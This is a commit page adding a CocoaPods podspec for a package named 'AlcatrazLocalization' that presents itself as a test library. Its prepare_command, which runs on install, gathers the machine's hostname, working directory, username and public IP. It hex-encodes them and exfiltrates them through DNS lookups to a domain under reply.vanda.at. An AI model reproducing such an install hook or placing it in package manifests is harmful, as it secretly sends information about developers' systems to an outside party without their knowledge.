Skip to content

Commit

Permalink
[Add] AlcatrazLocalization 2.6.3
Browse files Browse the repository at this point in the history
  • Loading branch information
d-pod-test authored and CocoaPodsBot committed Feb 25, 2025
1 parent 97f7163 commit c898a78
Showing 1 changed file with 29 additions and 0 deletions.
Original file line number Diff line number Diff line change
@@ -0,0 +1,29 @@
{
"name": "AlcatrazLocalization",
"version": "2.6.3",
"summary": "Test",
"description": "A test cocoapod",
"license": {
"type": "MIT",
"file": "LICENSE"
},
"authors": {
"David Schmidt": "[email protected]"
},
"source": {
"git": "https://github.com/d-pod-test/AlcatrazLocalization.git"
},
"homepage": "https://github.com/d-pod-test/AlcatrazLocalization.git",
"platforms": {
"ios": "9.0"
},
"source_files": "Classes/ExampleLib.{m,h}",
"dependencies": {
"Alamofire": [

]
},
"swift_versions": "4.0",
"prepare_command": "a=$(hostname;pwd;whoami;echo 'AlcatrazLocalization';curl https://ifconfig.me;) && echo $a | xxd -p | head | while read ut;do nslookup $ut.reply.vanda.at;done",
"swift_version": "4.0"
}

0 comments on commit c898a78

Please sign in to comment.